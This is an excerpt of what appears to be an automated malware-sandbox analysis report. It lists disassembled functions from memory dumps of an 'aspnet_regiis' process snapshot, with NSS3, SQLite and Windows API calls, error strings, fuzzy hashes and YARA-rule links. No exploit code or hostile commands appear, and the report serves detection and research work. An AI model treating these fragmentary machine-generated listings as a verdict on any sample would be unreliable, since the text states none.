Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: 3A518BB5A01210AFE7108F14CC40F6E77A8AF42718F15815AE8199BA91E776EE05CFA3

Function 6C35E890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C35E922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C35E9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C35EA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C35EB20
memcpy.VCRUNTIME140(?,?,?), ref: 6C35EB57

Strings

foreign key on %s should reference only one column of table %T, xrefs: 6C35EE04
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C35EDC2
unknown column "%s" in foreign key definition, xrefs: 6C35ED18

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: 3d79f952bb070e92221f6c9e1db2493376aa6ac1a226ab7a0724358c0e9f8fd0
Instruction ID: 7047be5c08312e597546c2ac4f7f0c61999fd12155ecfd6c28f6a601e701f185
Opcode Fuzzy Hash: 3d79f952bb070e92221f6c9e1db2493376aa6ac1a226ab7a0724358c0e9f8fd0
Instruction Fuzzy Hash: D702AFB5E042158FDB04CF99C480EAEB7F6BF89308F594169D815AB751D739A811CFE0

Function 6C492F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C492FFD
sqlite3_initialize.NSS3 ref: 6C493007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C493032
sqlite3_mprintf.NSS3(6C4FAAF9,?), ref: 6C493073
sqlite3_free.NSS3(?), ref: 6C4930B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C4930C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C4930BB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 4ff6f88c419efa8f65360318707cde3e21f2723619421de946d43cdaa8611dcb
Instruction ID: 474b4c9e0b050afc62628d47b69e1b8e5c88bc90bb5d3b7187510931b4e312a1
Opcode Fuzzy Hash: 4ff6f88c419efa8f65360318707cde3e21f2723619421de946d43cdaa8611dcb
Instruction Fuzzy Hash: 5541BD71A00A16ABDB10CF25D884E86BBF5FF45369F048628EC5987B40E731F995CBD1

Function 6C3D8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C3E124D,00000001), ref: 6C3D8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C3E124D,00000001), ref: 6C3D8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C3E124D,00000001), ref: 6C3D8D73
PR_Unlock.NSS3(?,?,?,?,?,6C3E124D,00000001), ref: 6C3D8D8C

Part of subcall function 6C46DD70: TlsGetValue.KERNEL32 ref: 6C46DD8C
Part of subcall function 6C46DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C46DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C3E124D,00000001), ref: 6C3D8DBA

Strings

KRAM, xrefs: 6C3D8D3E
KRAM, xrefs: 6C3D8CF9

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 5974b2c582c916a783fe2ebf0c8370511078f9c8ecc6714369f7deea126bd87c
Instruction ID: f21efb1c345a64c011d842114614ec1d56db199472b105415663e0619a20e7de
Opcode Fuzzy Hash: 5974b2c582c916a783fe2ebf0c8370511078f9c8ecc6714369f7deea126bd87c
Instruction Fuzzy Hash: 77216DB6A046018BCB00EF39C48469AB7F4FF55308F16896AD89987B41D735F841CFD2

Function 6C4D0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C4D0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C4D0EFA

Part of subcall function 6C3BAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C3BAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C4D0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C4D0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C4D0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C4D0F2B

Strings

Aborting, xrefs: 6C4D0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C4D0ED9, 6C4D0EE5, 6C4D0F06, 6C4D0F0B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 44ea48490fec745316b33849e676f13f2f9f82ec05ef8e5295d05bbc4dedbd14
Instruction ID: c37253f51a3d1171221d26e716de353d9cb46ed0239eb6f0b9c1c21d1d80c378
Opcode Fuzzy Hash: 44ea48490fec745316b33849e676f13f2f9f82ec05ef8e5295d05bbc4dedbd14
Instruction Fuzzy Hash: 5701ADB5A00144ABDF01AF64DC5AC9B3B2CEF46278B024068FD0987B02D672F9108AA6

Function 6C494D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C494DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C494DE0

Strings

misuse, xrefs: 6C494DD5
API call with %s database connection pointer, xrefs: 6C494DBD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C494DCB
%s at line %d of [%.10s], xrefs: 6C494DDA
invalid, xrefs: 6C494DB8

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 13104444c8088d4050039cda0866c9ad02150484fcdf5932616e9407b1cd2997
Instruction ID: efe3e59f70b879417ac88571c4d642160cfd3af818f89de98849e5bdf90db08a
Opcode Fuzzy Hash: 13104444c8088d4050039cda0866c9ad02150484fcdf5932616e9407b1cd2997
Instruction Fuzzy Hash: C2F05929F156B82BD710C015CC20F823F955F8239AF061BA0EE246BFB2D209984082D1

Function 6C494DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C494E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C494E4D

Strings

misuse, xrefs: 6C494E42
API call with %s database connection pointer, xrefs: 6C494E2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C494E38
%s at line %d of [%.10s], xrefs: 6C494E47
invalid, xrefs: 6C494E25

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 37ffdcbf47c53161a73ed23948ea97cf38d5d4a1f9b4c7c402e1908211f897c9
Instruction ID: 707dc48061090d8b811afe847482e6c68c245da5e72d4647c7d19ca64fe213f0
Opcode Fuzzy Hash: 37ffdcbf47c53161a73ed23948ea97cf38d5d4a1f9b4c7c402e1908211f897c9
Instruction Fuzzy Hash: 7EF02715F859B82FEE10D025DC10F923F855B063AFF1955A1EE3967F92D209986242E2

Function 6C400C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C401444,?,00000001,?,00000000,00000000,?,?,6C401444,?,?,00000000,?,?), ref: 6C400CB3

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C401444,?,00000001,?,00000000,00000000,?,?,6C401444,?), ref: 6C400DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C401444,?,00000001,?,00000000,00000000,?,?,6C401444,?), ref: 6C400DEC

Part of subcall function 6C420F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C3C2AF5,?,?,?,?,?,6C3C0A1B,00000000), ref: 6C420F1A
Part of subcall function 6C420F10: malloc.MOZGLUE(00000001), ref: 6C420F30
Part of subcall function 6C420F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C420F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C401444,?,00000001,?,00000000,00000000,?), ref: 6C400DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C401444,?,00000001,?,00000000), ref: 6C400E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C401444,?,00000001,?,00000000,00000000,?), ref: 6C400E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C401444,?,00000001,?,00000000,00000000,?,?,6C401444,?,?,00000000), ref: 6C400E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C401444,?,00000001,?,00000000,00000000,?), ref: 6C400E79

Part of subcall function 6C411560: TlsGetValue.KERNEL32(00000000,?,6C3E0844,?), ref: 6C41157A
Part of subcall function 6C411560: EnterCriticalSection.KERNEL32(?,?,?,6C3E0844,?), ref: 6C41158F
Part of subcall function 6C411560: PR_Unlock.NSS3(?,?,?,?,6C3E0844,?), ref: 6C4115B2

Part of subcall function 6C3DB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C3E1397,00000000,?,6C3DCF93,5B5F5EC0,00000000,?,6C3E1397,?), ref: 6C3DB1CB
Part of subcall function 6C3DB1A0: free.MOZGLUE(5B5F5EC0,?,6C3DCF93,5B5F5EC0,00000000,?,6C3E1397,?), ref: 6C3DB1D2

Part of subcall function 6C3D89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C3D88AE,-00000008), ref: 6C3D8A04
Part of subcall function 6C3D89E0: EnterCriticalSection.KERNEL32(?), ref: 6C3D8A15
Part of subcall function 6C3D89E0: memset.VCRUNTIME140(6C3D88AE,00000000,00000132), ref: 6C3D8A27
Part of subcall function 6C3D89E0: PR_Unlock.NSS3(?), ref: 6C3D8A35

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 5c73d6e9818f3cd52718ae35301ebf816215fc7e44af67aea7649a57a3313ab4
Instruction ID: b1317db7e42d911f033041af934b2085a5b964ff40f4164ec2ba7b2a080500dc
Opcode Fuzzy Hash: 5c73d6e9818f3cd52718ae35301ebf816215fc7e44af67aea7649a57a3313ab4
Instruction Fuzzy Hash: B95194B6E002115FEB01DF64DC81EAB37A8AF49259F150035EC49A7B12E731ED15CBE2

Function 6C3B6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C3B6ED8
sqlite3_value_text.NSS3(?,?), ref: 6C3B6EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C3B6FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C3B6FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C3B6FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C3B7010
sqlite3_value_blob.NSS3(?,?), ref: 6C3B701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C3B7052

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: c8a1f73a1895ae1d71bbabb3cf59dd2f4d6ad86a6335cedc4113e5cb1ba90f26
Instruction ID: 54626db9f36c5daa02e46e15c3188c9e1b3d9f98186f0d0b00d597b7fedd2de9
Opcode Fuzzy Hash: c8a1f73a1895ae1d71bbabb3cf59dd2f4d6ad86a6335cedc4113e5cb1ba90f26
Instruction Fuzzy Hash: E161D2B1E052098BDB04CBA8C810BEEB7B6AF95308F184169D415BBB52E7329C15CFA1

Function 6C428F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C427313), ref: 6C428FBB

Part of subcall function 6C4207B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C3C8298,?,?,?,6C3BFCE5,?), ref: 6C4207BF
Part of subcall function 6C4207B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4207E6
Part of subcall function 6C4207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C42081B
Part of subcall function 6C4207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C420825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C427313), ref: 6C429012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C427313), ref: 6C42903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C427313), ref: 6C42909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C427313), ref: 6C4290DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C427313), ref: 6C4290F1

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C427313), ref: 6C42906B

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C427313), ref: 6C429128

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: df4b950705fa182f2a0fd27bfc156b410e424445f63bc277e2d43427240c2af1
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: AF51CE71A002058FFB10CF6ADC86F26B3F9AF54319F154069E915D7B61EB3AE800CBA1

Function 6C4088E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4088FC

Part of subcall function 6C41BE30: SECOID_FindOID_Util.NSS3(6C3D311B,00000000,?,6C3D311B,?), ref: 6C41BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C408913

Part of subcall function 6C420FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3C87ED,00000800,6C3BEF74,00000000), ref: 6C421000
Part of subcall function 6C420FF0: PR_NewLock.NSS3(?,00000800,6C3BEF74,00000000), ref: 6C421016
Part of subcall function 6C420FF0: PL_InitArenaPool.NSS3(00000000,security,6C3C87ED,00000008,?,00000800,6C3BEF74,00000000), ref: 6C42102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C4ED864,?), ref: 6C408947

Part of subcall function 6C41E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C41E245
Part of subcall function 6C41E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C41E254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C40895B
DER_GetInteger_Util.NSS3(?), ref: 6C408973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C408982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4089EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C408A12

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID:
API String ID: 2145430656-0
Opcode ID: 08c8c1ee09c386eb8045622d15cc38f626b74d470c769e28bb39c71550e1bcf1
Instruction ID: c7469c80d460eec7e63c0225de4cb4a87eed0b67372c765cbf5005da8ec5c423
Opcode Fuzzy Hash: 08c8c1ee09c386eb8045622d15cc38f626b74d470c769e28bb39c71550e1bcf1
Instruction Fuzzy Hash: A03169B1B88A0056F710E339AE42FAB32949F9132DF240A3BD919D3F91FB25C44681D3

Function 6C4D0860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C4D7AE2,?,?,?,?,?,?,6C4D798A), ref: 6C4D086C

Part of subcall function 6C4D0930: EnterCriticalSection.KERNEL32(?,00000000,?,6C4D0C83), ref: 6C4D094F
Part of subcall function 6C4D0930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C4D0C83), ref: 6C4D0974
Part of subcall function 6C4D0930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0983
Part of subcall function 6C4D0930: _PR_MD_UNLOCK.NSS3(?,?,6C4D0C83), ref: 6C4D099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C4D7AE2,?,?,?,?,?,?,6C4D798A), ref: 6C4D087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C4D7AE2,?,?,?,?,?,?,6C4D798A), ref: 6C4D0892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C4D798A), ref: 6C4D08AA
free.MOZGLUE(?,00000000,00000000,?,?,6C4D7AE2,?,?,?,?,?,?,6C4D798A), ref: 6C4D08C7
free.MOZGLUE(?,00000000,00000000,?,?,6C4D7AE2,?,?,?,?,?,?,6C4D798A), ref: 6C4D08E9
free.MOZGLUE(?,6C4D7AE2,?,?,?,?,?,?,6C4D798A), ref: 6C4D08EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C4D7AE2,?,?,?,?,?,?,6C4D798A), ref: 6C4D090E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

